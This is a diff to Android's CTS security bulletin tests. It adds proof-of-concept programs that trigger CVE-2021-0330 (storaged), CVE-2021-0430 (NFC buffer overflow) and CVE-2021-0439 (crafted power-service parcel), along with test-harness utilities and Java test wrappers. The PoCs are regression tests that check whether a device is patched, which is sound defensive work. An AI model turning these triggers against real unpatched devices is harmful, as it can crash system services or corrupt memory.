70c3eedfbf2..c32cb4a1c7e 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0450/Android.bp @@ -27,9 +27,6 @@ cc_test { "-DENABLE_SELECTIVE_OVERLOADING", ], multilib: { - lib32: { - suffix: "32", - }, lib64: { include_dirs: [ "system/nfc/src/nfc/include/", @@ -41,7 +38,6 @@ cc_test { shared_libs: [ "libnfc-nci", ], - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp index 1876c60bcf0..1c231b77c2f 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0470/Android.bp @@ -22,14 +22,10 @@ cc_test { "poc.cpp", ], multilib: { - lib32: { - suffix: "32", - }, lib64: { shared_libs: [ "libmediandk", ], - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/Android.bp new file mode 100644 index 00000000000..30915d5af09 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/Android.bp @@ -0,0 +1,28 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2021-0330", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + shared_libs: [ + "libutils", + "libbinder", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/poc.cpp new file mode 100644 index 00000000000..4d7254f108b --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0330/poc.cpp @@ -0,0 +1,70 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <binder/IServiceManager.h> +#include <binder/Parcel.h> +#include <pthread.h> +#include <unistd.h> +#include "../includes/common.h" + +using namespace android; + +static int userId = 0; +constexpr int kMaxThreads = 2; +constexpr int kMaxUsers = 1024 * 1024; +constexpr int kSleepDuration = 5; + + +static void *trigger_onUserStarted(void *p __attribute__((unused))) { + sp<IServiceManager> sm = defaultServiceManager(); + sp<IBinder> service = sm->checkService(String16("storaged")); + + if (not service) { + return nullptr; + } + + while (userId < kMaxUsers) { + Parcel data, reply; + data.writeInterfaceToken(service->getInterfaceDescriptor()); + data.writeInt32(++userId); + service->transact(1, data, &reply, 0); + } + + return nullptr; +} + +int main() { + pthread_t threads[kMaxThreads]; + + for (int t = 0; t < kMaxThreads; ++t) { + pthread_create(&threads[t], nullptr, trigger_onUserStarted, nullptr); + } + for (int t = 0; t < kMaxThreads; ++t) { + pthread_join(threads[t], nullptr); + } + + time_t currentTime = start_timer(); + while (timer_active(currentTime)) { + sp<IServiceManager> sm = defaultServiceManager(); + sp<IBinder> service = sm->checkService(String16("storaged")); + if (service) { + break; + } + sleep(kSleepDuration); + } + + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp new file mode 100644 index 00000000000..5cad1e4e82c --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/Android.bp @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2021-0430", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/include", + "system/nfc/src/gki/common", + "system/nfc/src/nfc/include", + "system/nfc/src/gki/ulinux/", + ], + shared_libs: [ + "libnfc-nci", + ], +} + diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp new file mode 100644 index 00000000000..947f46a2007 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0430/poc.cpp @@ -0,0 +1,87 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <nfc_int.h> +#include <rw_int.h> + +#define RW_MFC_STATE_READ_NDEF 0x03 +#define RW_MFC_SUBSTATE_READ_BLOCK 0x03 + +extern tRW_CB rw_cb; + +void GKI_freebuf(void*) { +} + +void GKI_start_timer(uint8_t, int32_t, bool) { +} + +void GKI_stop_timer(uint8_t) { +} + +void cback(tRW_EVENT, tRW_DATA*) { +} + +int main() { + tRW_MFC_CB* p_mfc = &rw_cb.tcb.mfc; + + GKI_init(); + rw_init(); + + uint8_t selres = 1; + uint8_t uid[MFC_UID_LEN] = { 1 }; + if (rw_mfc_select(selres, uid) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + p_mfc->state = RW_MFC_STATE_READ_NDEF; + p_mfc->substate = RW_MFC_SUBSTATE_READ_BLOCK; + + tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + + tNFC_CONN* p_data = (tNFC_CONN*) malloc(sizeof(tNFC_CONN)); + if (!p_data) { + return EXIT_FAILURE; + } + + p_data->data.p_data = (NFC_HDR*) malloc(sizeof(uint8_t) * 16); + if (!(p_data->data.p_data)) { + free(p_data); + return EXIT_FAILURE; + } + + p_data->data.status = NFC_STATUS_OK; + tNFC_CONN_EVT event = NFC_DATA_CEVT; + + NFC_HDR* mfc_data = (NFC_HDR*) p_data->data.p_data; + mfc_data->len = 0x10; + mfc_data->offset = 0; + p_mfc->ndef_length = 1024; + p_mfc->p_ndef_buffer = (uint8_t*) malloc(sizeof(uint8_t) * 16); + if (!(p_mfc->p_ndef_buffer)) { + free(p_data->data.p_data); + free(p_data); + return EXIT_FAILURE; + } + + rw_cb.p_cback = cback; + + p_cb->p_cback(0, event, p_data); + + free(p_mfc->p_ndef_buffer); + free(p_data->data.p_data); + free(p_data); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/Android.bp new file mode 100644 index 00000000000..5cfd2f5c0bc --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/Android.bp @@ -0,0 +1,31 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2021-0439", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp" + ], + shared_libs : [ + "libutils", + "libbinder", + ], + cflags: [ + "-DDO_NOT_CHECK_MANUAL_BINDER_INTERFACES", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp new file mode 100644 index 00000000000..65cab130f75 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0439/poc.cpp @@ -0,0 +1,49 @@ +/* + * Copyright 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <binder/IServiceManager.h> +#include <binder/Parcel.h> + +using namespace android; + +int main() { + sp<IServiceManager> sm = defaultServiceManager(); + sp<IBinder> binder = sm->getService(String16("power")); + if (!binder) { + return EXIT_FAILURE; + } + Parcel data, result; + data.writeInterfaceToken(String16("android.os.IPowerManager")); + char d[] = {static_cast<char>(0xc9), + static_cast<char>(0xa4), + 0x10, + static_cast<char>(0xd4), + 0x00, + 0x00, + 0x00, + 0x00, + 0x00, + 0x27, + 0x00, + 0x5a, + 0x00, + 0x00, + 0x00, + 0x00}; + data.write(d, sizeof(d)); + binder->transact(6, data, &result); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/pac/pac.cpp b/hostsidetests/securitybulletin/securityPatch/pac/pac.cpp index 393848dab1f..0629ec3bf75 100644 --- a/hostsidetests/securitybulletin/securityPatch/pac/pac.cpp +++ b/hostsidetests/securitybulletin/securityPatch/pac/pac.cpp @@ -20,15 +20,22 @@ #include <codecvt> #include <fstream> #include <iostream> +#include "../includes/common.h" const char16_t* spec = u""; const char16_t* host = u""; int main(int argc, char *argv[]) { + bool shouldRunMultipleTimes = false; if (argc != 2) { - std::cout << "incorrect number of arguments" << std::endl; - std::cout << "usage: ./pacrunner mypac.pac" << std::endl; - return EXIT_FAILURE; + if (argc != 3) { + std::cout << "incorrect number of arguments" << std::endl; + std::cout << "usage: ./pacrunner mypac.pac (or)" << std::endl; + std::cout << "usage: ./pacrunner mypac.pac true" << std::endl; + return EXIT_FAILURE; + } else { + shouldRunMultipleTimes = true; + } } ProxyResolverV8Handle* handle = ProxyResolverV8Handle_new(); @@ -50,7 +57,10 @@ int main(int argc, char *argv[]) { std::codecvt_utf8_utf16<char16_t>, char16_t>{}.from_bytes(u8Script); ProxyResolverV8Handle_SetPacScript(handle, u16Script.data()); - ProxyResolverV8Handle_GetProxyForURL(handle, spec, host); + time_t currentTime = start_timer(); + do { + ProxyResolverV8Handle_GetProxyForURL(handle, spec, host); + } while (shouldRunMultipleTimes && timer_active(currentTime)); ProxyResolverV8Handle_delete(handle); return EXIT_SUCCESS; diff --git a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java index 5d22ed12324..cf48079bef1 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java @@ -23,6 +23,7 @@ import com.android.compatibility.common.util.ResultUnit; import com.android.ddmlib.IShellOutputReceiver; import com.android.ddmlib.NullOutputReceiver; import com.android.ddmlib.CollectingOutputReceiver; +import com.android.tradefed.device.DeviceNotAvailableException; import com.android.tradefed.device.ITestDevice; import com.android.tradefed.device.NativeDevice; import com.android.tradefed.log.LogUtil.CLog; @@ -34,6 +35,7 @@ import java.io.InputStream; import java.io.OutputStream; import java.util.concurrent.TimeoutException; import java.util.List; +import java.util.Map; import java.util.regex.Pattern; import java.util.concurrent.TimeUnit; import java.util.Scanner; @@ -48,8 +50,9 @@ import org.json.JSONObject; import java.util.regex.Pattern; import java.lang.Thread; + import static org.junit.Assert.*; -import junit.framework.Assert; +import static org.junit.Assume.*; public class AdbUtils { @@ -60,6 +63,7 @@ public class AdbUtils { public static class pocConfig { String binaryName; String arguments; + Map<String, String> envVars; String inputFilesDestination; ITestDevice device; CrashUtils.Config config; @@ -162,8 +166,25 @@ public class AdbUtils { */ public static int runPoc(String pocName, ITestDevice device, int timeout, String arguments, IShellOutputReceiver receiver) throws Exception { + return runPoc(pocName, device, timeout, arguments, null, receiver); + } + + /** + * Pushes and runs a binary with arguments to the selected device and + * ignores any of its output. + * + * @param pocName name of the poc binary + * @param device device to be ran on + * @param timeout time to wait for output in seconds + * @param arguments input arguments for the poc + * @param envVars run the poc with environment variables + * @param receiver the type of receiver to run against + */ + public static int runPoc(String pocName, ITestDevice device, int timeout, + String arguments, Map<String, String> envVars, + IShellOutputReceiver receiver) throws Exception { String remoteFile = String.format("%s%s", TMP_PATH, pocName); - SecurityTestCase.getPocPusher(device).pushFile(pocName, remoteFile); + SecurityTestCase.getPocPusher(device).pushFile(pocName + "_sts", remoteFile); assertPocExecutable(pocName, device); if (receiver == null) { @@ -173,11 +194,26 @@ public class AdbUtils { arguments = ""; } + String env = ""; + if (envVars != null) { + StringBuilder sb = new StringBuilder(); + for (Map.Entry<String, String> entry : envVars.entrySet()) { + sb + .append(entry.getKey().trim()) + .append('=') + .append(entry.getValue().trim()) + .append(' '); + } + env = sb.toString(); + CLog.i("Running poc '%s' with env variables '%s'", pocName, env); + } + // since we have to return the exit status AND the poc stdout+stderr we redirect the exit // status to a file temporarily String exitStatusFilepath = TMP_PATH + "exit_status"; runCommandLine("rm " + exitStatusFilepath, device); // remove any old exit status - device.executeShellCommand(TMP_PATH + pocName + " " + arguments + + device.executeShellCommand( + env + TMP_PATH + pocName + " " + arguments + "; echo $? > " + exitStatusFilepath, // echo exit status to file receiver, timeout, TimeUnit.SECONDS, 0); @@ -411,7 +447,21 @@ public class AdbUtils { */ public static int runPocGetExitStatus(String pocName, String arguments, ITestDevice device, int timeout) throws Exception { - return runPoc(pocName, device, timeout, arguments, null); + return runPocGetExitStatus(pocName, arguments, null, device, timeout); + } + + /** + * Pushes and runs a binary to the device and returns the exit status. + * @param pocName name of the poc binary + * @param arguments input arguments for the poc + * @param envVars run the poc with environment variables + * @param device device to be run on + * @param timeout time to wait for output in seconds + */ + public static int runPocGetExitStatus( + String pocName, String arguments, Map<String, String> envVars, + ITestDevice device, int timeout) throws Exception { + return runPoc(pocName, device, timeout, arguments, envVars, null); } /** @@ -434,8 +484,22 @@ public class AdbUtils { */ public static void runPocAssertExitStatusNotVulnerable(String pocName, String arguments, ITestDevice device, int timeout) throws Exception { + runPocGetExitStatus(pocName, arguments, null, device, timeout); + } + + /** + * Pushes and runs a binary and asserts that the exit status isn't 113: vulnerable. + * @param pocName name of the poc binary + * @param arguments input arguments for the poc + * @param envVars run the poc with environment variables + * @param device device to be ran on + * @param timeout time to wait for output in seconds + */ + public static void runPocAssertExitStatusNotVulnerable( + String pocName, String arguments, Map<String, String> envVars, + ITestDevice device, int timeout) throws Exception { assertTrue("PoC returned exit status 113: vulnerable", - runPocGetExitStatus(pocName, arguments, device, timeout) != 113); + runPocGetExitStatus(pocName, arguments, envVars, device, timeout) != 113); } /** @@ -445,9 +509,24 @@ public class AdbUtils { * @param device device to be ran on */ public static int runProxyAutoConfig(String pacName, ITestDevice device) throws Exception { + return runProxyAutoConfig(pacName, null, device); + } + + /** + * Runs the binary against a given proxyautoconfig file, asserting that it doesn't + * crash + * @param pacName the name of the proxy autoconfig script from the /res folder + * @param arguments input arguments for pacrunner + * @param device device to be ran on + */ + public static int runProxyAutoConfig(String pacName, String arguments, + ITestDevice device) throws Exception { pacName += ".pac"; String targetPath = TMP_PATH + pacName; AdbUtils.pushResource("/" + pacName, targetPath, device); + if(arguments != null) { + targetPath += " " + arguments; + } runPocAssertNoCrashes( "pacrunner", device, targetPath, new CrashUtils.Config().setProcessPatterns("pacrunner")); @@ -564,8 +643,33 @@ public class AdbUtils { public static void runPocAssertNoCrashesNotVulnerable(String binaryName, String arguments, String inputFiles[], String inputFilesDestination, ITestDevice device, String processPatternStrings[]) throws Exception { + runPocAssertNoCrashesNotVulnerable(binaryName, arguments, null, + inputFiles, inputFilesDestination, device, processPatternStrings); + } + + /** + * Runs the poc binary and asserts following 3 conditions. + * 1. There are no security crashes in the binary. + * 2. There are no security crashes that match the expected process pattern. + * 3. The exit status isn't 113 (Code 113 is used to indicate the vulnerability condition). + * + * @param binaryName name of the binary + * @param arguments arguments for running the binary + * @param envVars run the poc with environment variables + * @param inputFiles files required as input + * @param inputFilesDestination destination directory to which input files are + * pushed + * @param device device to be run on + * @param processPatternStrings a Pattern string (other than binary name) to match the crash + * tombstone process + */ + public static void runPocAssertNoCrashesNotVulnerable( + String binaryName, String arguments, Map<String, String> envVars, + String inputFiles[], String inputFilesDestination, ITestDevice device, + String... processPatternStrings) throws Exception { pocConfig testConfig = new pocConfig(binaryName, device); testConfig.arguments = arguments; + testConfig.envVars = envVars; if (inputFiles != null) { testConfig.inputFiles = Arrays.asList(inputFiles); @@ -602,7 +706,7 @@ public class AdbUtils { runCommandLine("logcat -c", testConfig.device); try { runPocAssertExitStatusNotVulnerable(testConfig.binaryName, testConfig.arguments, - testConfig.device, TIMEOUT_SEC); + testConfig.envVars, testConfig.device, TIMEOUT_SEC); } catch (IllegalArgumentException e) { /* * Since 'runPocGetExitStatus' method raises IllegalArgumentException upon @@ -671,5 +775,9 @@ public class AdbUtils { } catch (JSONException e) {} } fail(error.toString()); - } + } + + public static void assumeHasNfc(ITestDevice device) throws DeviceNotAvailableException { + assumeTrue("nfc not available on device", device.hasFeature("android.hardware.nfc")); + } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java new file mode 100644 index 00000000000..e6e10156a09 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java @@ -0,0 +1,42 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import com.android.compatibility.common.util.CrashUtils; +import static org.junit.Assume.assumeFalse; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2016_2182 extends SecurityTestCase { + + /** + * b/32096880 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2017-03") + @Test + public void testPocCVE_2016_2182() throws Exception { + assumeFalse(moduleIsPlayManaged("com.google.android.conscrypt")); + String binaryName = "CVE-2016-2182"; + AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice()); + testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName); + testConfig.config.checkMinAddress(false); + AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java new file mode 100644 index 00000000000..9d032cd77ef --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_8332.java @@ -0,0 +1,36 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2016_8332 extends SecurityTestCase { + + /** + * b/37761553 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2017-06") + @Test + public void testPocCVE_2016_8332() throws Exception { + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2016-8332", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java new file mode 100644 index 00000000000..4dd4b39acd1 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java @@ -0,0 +1,38 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2017_0684 extends SecurityTestCase { + + /** + * b/35421151 + * Vulnerability Behaviour: SIGSEGV in media.codec + */ + @SecurityTest(minPatchLevel = "2017-07") + @Test + public void testPocCVE_2017_0684() throws Exception { + pocPusher.only32(); + String errPattern[] = {"media\\.codec", "omx@\\d+?\\.\\d+?-service"}; + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-0684", null, getDevice(), + errPattern); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java new file mode 100644 index 00000000000..5a17589a504 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java @@ -0,0 +1,38 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2017_0726 extends SecurityTestCase { + + /** + * b/36389123 + * Vulnerability Behaviour: EXIT_VULNERABLE (113) + */ + @SecurityTest(minPatchLevel = "2017-08") + @Test + public void testPocCVE_2017_0726() throws Exception { + pocPusher.only64(); + String inputFiles[] = {"cve_2017_0726.mp4"}; + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-0726", + AdbUtils.TMP_PATH + inputFiles[0], inputFiles, AdbUtils.TMP_PATH, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java new file mode 100644 index 00000000000..ab83ce38c9f --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_13194.java @@ -0,0 +1,42 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +import static org.junit.Assert.*; +import static org.junit.Assume.*; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2017_13194 extends SecurityTestCase { + + /** + * b/64710201 + * Vulnerability Behaviour: SIGSEGV in media.codec + */ + @SecurityTest(minPatchLevel = "2018-01") + @Test + public void testPocCVE_2017_13194() throws Exception { + assumeFalse(moduleIsPlayManaged("com.google.android.media.swcodec")); + pocPusher.only64(); + String processPatternStrings[] = {"media\\.codec", "omx@\\d+?\\.\\d+?-service"}; + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-13194", null, getDevice(), + processPatternStrings); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java new file mode 100644 index 00000000000..6f1c03f9b60 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9558.java @@ -0,0 +1,45 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.compatibility.common.util.CrashUtils; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2018_9558 extends SecurityTestCase { + + /** + * b/112161557 + * Vulnerability Behaviour: SIGABRT in self + */ + @SecurityTest(minPatchLevel = "2018-12") + @Test + public void testPocCVE_2018_9558() throws Exception { + AdbUtils.assumeHasNfc(getDevice()); + pocPusher.only64(); + String binaryName = "CVE-2018-9558"; + String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT}; + AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice()); + testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName); + testConfig.config.setSignals(signals); + AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java new file mode 100644 index 00000000000..ad88bb77eb1 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9561.java @@ -0,0 +1,37 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2018_9561 extends SecurityTestCase { + + /** + * b/111660010 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2019-03") + @Test + public void testPocCVE_2018_9561() throws Exception { + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2018-9561", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java new file mode 100644 index 00000000000..8f8b53de0d3 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2018_9563.java @@ -0,0 +1,37 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the 